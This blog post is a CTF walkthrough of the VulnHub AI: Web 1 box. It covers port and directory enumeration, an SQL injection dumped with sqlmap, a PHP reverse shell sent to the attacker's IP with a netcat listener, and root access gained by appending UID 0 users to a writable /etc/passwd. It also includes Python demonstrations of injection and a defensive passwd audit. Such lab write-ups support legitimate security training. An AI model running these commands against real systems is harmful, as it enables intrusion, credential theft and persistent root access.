Pentesting: AI: WEB 1 | Privilege Escalation Attack | Python Reverse Shell | Vulnerabilities | SQL Injection | WriteUp | Walkthrough | VulnHub CTF | Flags

SHAMS UL MEHMOOD
9 min read · May 21, 2024


Hello friends, I'm Shams Ul Mehmood and this is my 4th article. It is a complete walkthrough of the AI: Web: 1 VulnHub box, which covers SQL injection, a PHP reverse shell upgraded to a TTY with Python, and privilege escalation through a writable /etc/passwd. You can find this VulnHub box here.

Steps:

  1. Find the target machine's IP address with netdiscover
  2. Get open port details with Nmap
  3. Enumerate the HTTP service with dirb, gobuster and nikto
  4. Exploit the SQL injection vulnerability
  5. Get a reverse shell, upgrade it with Python, and escalate privileges

Step-1:

📌️ In the first step I used netdiscover with -r to scan the local network range and find the IP address of the victim machine.

Command : sudo netdiscover -r 192.168.204.0/24

Step-2:

📌️ In the second step, with the victim's IP address in hand, I ran an Nmap scan against it. I used:

  • -sS : TCP SYN (half-open) scan.
  • -sV : detect the version of the service behind each open port.
  • -p- : scan all 65535 TCP ports.
  • -sC : run the default NSE scripts.

Command : sudo nmap -sS -p- -sV -sC 192.168.204.136

📌 The scan showed only one open port, 80/tcp (HTTP), so the web application is the whole attack surface.

📌 Next I opened the target IP address in a browser.

Step-3:

📌️ In this step, I used several tools (dirb, gobuster and nikto) to enumerate interesting hidden files and directories on the target.

Command : sudo dirb http://192.168.204.136

Command : sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.204.136

Command : nikto -h http://192.168.204.136/m3diNf0/

Command : nikto -h 192.168.204.136

📌 Then I appended /robots.txt to the victim's IP address in the browser address bar.

📌 The robots.txt has two kinds of lines: a User-agent line and Disallow entries.

📌 I then requested each entry one by one by appending it to the target IP address in the address bar (the '*' is the User-agent selector, not a path, so requesting it cannot work).

Command : 192.168.204.136/*

Command : 192.168.204.136/m3diNf0/

Command : 192.168.204.136/se3reTdir777/uploads/

📌 These returned error status codes: 404 (Not Found) and 403 (Forbidden).
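As an added example (not code from the box or the original walkthrough), here is a small parser that turns a robots.txt body into the paths worth requesting. The robots.txt text inside it is constructed to mirror what this step describes (one User-agent line, two Disallow entries), not a capture from the target; the '*' on the User-agent line is a group selector, so it never becomes a URL path, and a forbidden subdirectory also yields its parent, which is how /se3reTdir777/ turns up.

```python
"""Turn a robots.txt body into the paths worth probing.

Added example for this walkthrough; it is not code from the box or the
original article. SAMPLE_ROBOTS is constructed to mirror what the article
describes (one User-agent line, two Disallow entries), not a capture.
"""
from urllib.parse import urljoin

# Constructed sample, modelled on the article's description of the target's robots.txt.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
"""


def parse_robots(text):
    """Return (user_agents, disallowed_paths) from a robots.txt body.

    Only Disallow values become paths. 'User-agent: *' selects a group of
    rules, so the '*' is never a path to request. A wildcard inside a
    Disallow value cannot be requested literally, so only the prefix
    before the first '*' is kept.
    """
    agents, paths = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and surrounding blanks
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            agents.append(value)
        elif field == "disallow" and value:
            prefix = value.split("*", 1)[0]
            if prefix:
                paths.append(prefix)
    return agents, paths


def candidate_urls(base, paths):
    """Expand each disallowed path into every URL worth requesting.

    A deep path yields its parents too, because the listed directory may be
    forbidden while its parent is the interesting page: /se3reTdir777/uploads/
    also gives /se3reTdir777/ (the form page in this box). A path without a
    trailing slash is treated as a file and is not given one.
    """
    urls = []
    for path in paths:
        is_dir = path.endswith("/")
        parts = [p for p in path.split("/") if p]
        for i in range(1, len(parts) + 1):
            last = i == len(parts)
            suffix = "" if (last and not is_dir) else "/"
            url = urljoin(base, "/" + "/".join(parts[:i]) + suffix)
            if url not in urls:
                urls.append(url)
    return urls


if __name__ == "__main__":
    agents, paths = parse_robots(SAMPLE_ROBOTS)
    print("user-agents:", agents)
    for url in candidate_urls("http://192.168.204.136", paths):
        print("probe:", url)
```

Feed the returned URLs to curl or a browser and compare status codes: a 403 on a directory usually means it exists but has listing disabled, which is exactly the case for the uploads directory here.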

📌 Appending /m3diNf0/info.php to the target IP address, however, returned an info page about the server configuration; it becomes important later because it reveals the path of the web root.

📌 Appending /se3reTdir777 to the victim IP address gave me a form page.

Command : 192.168.204.136/se3reTdir777/

📌 Entering a user ID in the form returned that user's basic info.

Step-4:

📌 In the fourth step, I found an error-based SQL injection in this form: putting a single quote (') in the text field makes the application return a database error.

📌 Before starting the exploitation, I captured the HTTP request of the form submission with Burp Suite, saved it to attack_request.txt on the Desktop, and then handed it to sqlmap.

📌 Then I used the following commands (the -C list must be comma-separated without spaces, otherwise the shell splits it into separate arguments; the user table only holds names, the credentials are in systemUser):

Command : ls ./Desktop/

Command : sudo sqlmap -r ./Desktop/attack_request.txt

Command : sudo sqlmap -r ./Desktop/attack_request.txt --dbs

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systemUser --columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user --columns

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T user -C firstName,id,lastName --dump

Command : sudo sqlmap -r ./Desktop/attack_request.txt -D aiweb1 -T systemUser --dump
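To show what the single-quote probe and the sqlmap enumeration above actually do to the query, here is an added example (not code from the box or the article) that reproduces the injection offline with SQLite. The user table and its three rows are constructed, not the box's data; lookup_vulnerable() is written the way the form evidently behaves (the id concatenated into the SQL string) and lookup_safe() is the parameterised fix. The UNION payload at the end is the hand-rolled version of what sqlmap's --tables/--columns automates; on a MySQL backend the same trick reads information_schema, SQLite's sqlite_master plays that role here.

```python
"""The injection behind the form, reproduced offline with SQLite.

Added example for this walkthrough, not code from the box or the article.
The 'user' table and its three rows are constructed to resemble the table
sqlmap dumps; they are not the box's data. lookup_vulnerable() is built
the way the box's form evidently behaves (the id is concatenated into
the query), and lookup_safe() is the fix.
"""
import sqlite3


def make_db():
    """In-memory database with a constructed 'user' table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, firstName TEXT, lastName TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)",
                    [(1, "Alice", "Example"), (2, "Bob", "Sample"), (3, "Carol", "Test")])
    return con


def lookup_vulnerable(con, uid):
    """User-controlled id pasted straight into the SQL string.

    A lone quote leaves the string literal unterminated and the engine's
    error text comes back to the caller; that leaked error is what makes
    the injection 'error-based' and what sqlmap keys on.
    """
    sql = f"SELECT id, firstName, lastName FROM user WHERE id = '{uid}'"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"ERROR: {exc}"  # the application echoes the DB error to the client


def lookup_safe(con, uid):
    """Same query with a bound parameter: the input is data, never SQL."""
    return con.execute(
        "SELECT id, firstName, lastName FROM user WHERE id = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "1"))                 # normal lookup
    print(lookup_vulnerable(con, "'"))                 # the probe from step 4: DB error leaks
    print(lookup_vulnerable(con, "1' OR '1'='1"))      # every row
    # what sqlmap's --tables/--columns does by hand: read the schema through a UNION
    print(lookup_vulnerable(con, "x' UNION SELECT 1, name, sql FROM sqlite_master--"))
    print(lookup_safe(con, "1' OR '1'='1"))            # [] : the payload is just a string
```

The trailing "--" in the UNION payload comments out the closing quote the application appends, which is why the injected SELECT parses cleanly; the safe variant returns nothing for the same input because the whole payload is compared as one string value.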

📌 The dumped passwords are base64-encoded, not encrypted, so they can be decoded directly with the following commands:

Command : echo RmFrZVVzZXJQYXNzdzByZA== | base64 -d

Command : echo TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | base64 -d

Command : echo TjB0VGhpczBuZUFsczA= | base64 -d

Command : sudo sqlmap -r ./Desktop/attack_request.txt --os-pwn

📌 The --os-pwn option goes through several prompts, so I will walk you through them. I had to try a few times before I got it right.

📌 I went with the default web application language, PHP, since we know the site runs PHP, and opted in to full path disclosure to start.

📌 This is where things get a little tricky.

📌 After some trial and error I went back to the info.php file we found earlier, which discloses a slightly unconventional document root:

Path : /home/www/html/web1x443290o2sdf92213/

📌 --os-pwn works by uploading a file stager, so it needs a directory on the server that the web user can write to. I joined this document root with the uploads directory from robots.txt, saved it to a text file called directory_listing, and used that file with option 3 (custom directory list file) at the next prompt.

📌 First I wrote the path below into the directory_listing file in root's home directory on my attacking machine:

Payload : /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads

Command : pwd

Command : cd /root

Command : nano /root/directory_listing

📌 Paste the above path into the directory_listing file and save it.

📌 Then enter the file's location at the sqlmap prompt.

📌 It looked like we were about to get a reverse TCP connection...

📌 But it failed!

📌 One of the best things about sqlmap, aside from automating the injection trial and error for you, is that it shows you exactly what it is doing.

Step-5:

📌 In the fifth step, when we look back at sqlmap's log we see this.

📌 It reveals a PHP file stager with an upload form that sqlmap had already placed in the uploads directory:

URL : http://192.168.204.136/se3reTdir777/uploads/tmpuanbs.php

📌 That makes everything much easier: we can upload our favourite php-reverse-shell script through it and be good to go.

📌 Here you can see php-reverse-shell.php.

📌 I changed the script to point at my local IP address, 192.168.204.143, and port 1010.

📌 I saved the modified copy as php_script.php.

📌 I then started a listener on my local machine with the following command.

Command : nc -lvp 1010

📌 Then I selected php_script.php from the Downloads directory with the upload form.

📌 After submitting, the file uploaded successfully.

📌 Now the moment of truth: with the listener still running in the background terminal, we browse to the uploaded php_script.php.

📌 Wow, I have a shell.

📌 Then I ran the following command:

Command : whoami

📌 I used Python's pty module to upgrade the shell to an interactive TTY.

Command : python -c "import pty; pty.spawn('/bin/bash')"

Command : whoami

Command : ls

Command : ls -l /etc/passwd

📌 The -l output shows the permissions on /etc/passwd; on this box the file is writable by www-data, which is what makes the next step possible. Here are the existing usernames:

Command : cat /etc/passwd

📌 Now I append new users to /etc/passwd. Two things matter here: the output must go to /etc/passwd itself with >> (a single > would truncate the file, and a bare 'passwd' creates an unrelated file in the current directory), and the second field must hold a password hash rather than 'x', because with 'x' su would look in /etc/shadow, where the new user does not exist. openssl generates an MD5-crypt hash; the salt value is arbitrary. With UID and GID 0 the new user is root in everything but name, so there is no need to add another 'root' line.

Command : echo "aiweb1pwn:$(openssl passwd -1 -salt s4lt 'MyEvilPass_f908sdaf9_sadfasf0sa'):0:0:root:/root:/bin/bash" >> /etc/passwd

Command : echo "cybershark:$(openssl passwd -1 -salt s4lt 'MyEvilPass_f908sdaf9_sadfasf0sa'):0:0:root:/root:/bin/bash" >> /etc/passwd

Command : tail -n 2 /etc/passwd

📌 If openssl is not installed on the target, generate the hash on your own machine and paste the resulting string into the echo command.
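From the defender's side, the escalation above leaves two obvious traces: a passwd file that should never be writable, and a second UID 0 account carrying its hash inline. As an added example (not code from the box or the article), this script audits passwd-format text for both. The SAMPLE_PASSWD body is constructed and the hash in it is a placeholder string, not a real crypt value; audit_file() runs the same checks against a real file.

```python
"""Audit a passwd file for what the escalation step leaves behind.

Added example for this walkthrough, not code from the box or the article.
It parses passwd-format text and reports (a) a world-writable file mode,
(b) any account besides root with UID 0, and (c) password hashes stored
inline instead of the 'x' that defers to /etc/shadow. SAMPLE_PASSWD is a
constructed file body and the hash in it is a placeholder string.
"""
import os
import stat

# Constructed sample: three normal entries plus an appended UID 0 account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
aiweb1pwn:$1$s4lt$placeholderhashvalue:0:0:root:/root:/bin/bash
"""

FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text):
    """Parse passwd-format text into a list of dicts; rejects malformed lines."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        entry = dict(zip(FIELDS, fields))
        entry["uid"], entry["gid"] = int(entry["uid"]), int(entry["gid"])
        entries.append(entry)
    return entries


def has_inline_hash(pw):
    """'x' defers to /etc/shadow; a '!' or '*' prefix means locked; anything else is a hash."""
    return pw not in ("", "x") and not pw.startswith(("!", "*"))


def rogue_root_accounts(entries):
    """Names of UID 0 accounts other than root."""
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def inline_hash_accounts(entries):
    """Names whose password field carries a hash instead of pointing at shadow."""
    return [e["name"] for e in entries if has_inline_hash(e["pw"])]


def world_writable(mode):
    """True if the 'other' write bit is set in a st_mode value."""
    return bool(mode & stat.S_IWOTH)


def audit(text, mode):
    """Findings for a passwd body plus its st_mode; an empty list means clean."""
    entries = parse_passwd(text)
    findings = []
    if world_writable(mode):
        findings.append("passwd is world-writable (mode %o)" % (mode & 0o777))
    for name in rogue_root_accounts(entries):
        findings.append(f"extra UID 0 account: {name}")
    for name in inline_hash_accounts(entries):
        findings.append(f"password hash stored inline, bypassing shadow: {name}")
    return findings


def audit_file(path="/etc/passwd"):
    """Run the audit on a real file."""
    with open(path) as fh:
        return audit(fh.read(), os.stat(path).st_mode)


if __name__ == "__main__":
    for finding in audit(SAMPLE_PASSWD, 0o100666):
        print("FINDING:", finding)
```

Run audit_file() from a cron job or your host-monitoring agent and alert on any non-empty result; a new UID 0 entry is rare enough in normal operation that it is worth a page on its own.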

📌 Then I switched from www-data to the new aiweb1pwn user.

Command : su aiweb1pwn

📌 Then I entered the password for the aiweb1pwn user.

Password : MyEvilPass_f908sdaf9_sadfasf0sa

Command : whoami

📌 Awesome, whoami reports root: the new user has UID 0, so I have root-level access to the victim machine.

📌 Then I used the following commands to find the flag in root's home directory.

Command : cd /root/

Command : ls

Command : cat flag.txt

CTF Game Over : I am Root!

\( ゚ヮ゚)/🏆 🏆🎯🏅 🚀

📈⭐🧑‍🎤🎭💯

⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠋⠁⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⠈⠙⣿⣿
⣿⣿⡄⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⢠⣿⣿
⣿⣿⣿⡀⠀⠀⢹⣿⣿⣿⣿⣿⠟⠉⠀⠀⠉⠻⣿⣿⣿⣿⣿⡏⠀⠀⢀⣿⣿⣿
⣿⣿⣿⣧⠀⠀⠀⢻⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⡟⠀⠀⠀⣼⣿⣿⣿
⣿⣿⣿⣿⡄⠀⠀⠈⢿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⡿⠁⠀⠀⢠⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠀⠀⠀⠈⢿⣿⠀⠀⠀⠀⠀⠀⠀⠀⣿⡿⠁⠀⠀⠀⣾⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠈⢻⡆⠀⠀⠀⠀⠀⠀⢰⡟⠁⠀⠀⠀⣼⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣇⠀⠀⠀⢸⣿⣦⡀⠀⠀⢀⣴⣿⡇⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠈⣇⠸⣿⠒⠒⣿⠇⣸⠁⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⣿⡀⢿⡄⢠⡿⢀⣿⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠸⣧⠘⣷⣾⠃⣼⠇⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⢹⡶⠛⠛⢶⡏⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠘⣧⣀⣀⣼⠃⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣿⣿⣶⣶⣶⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿
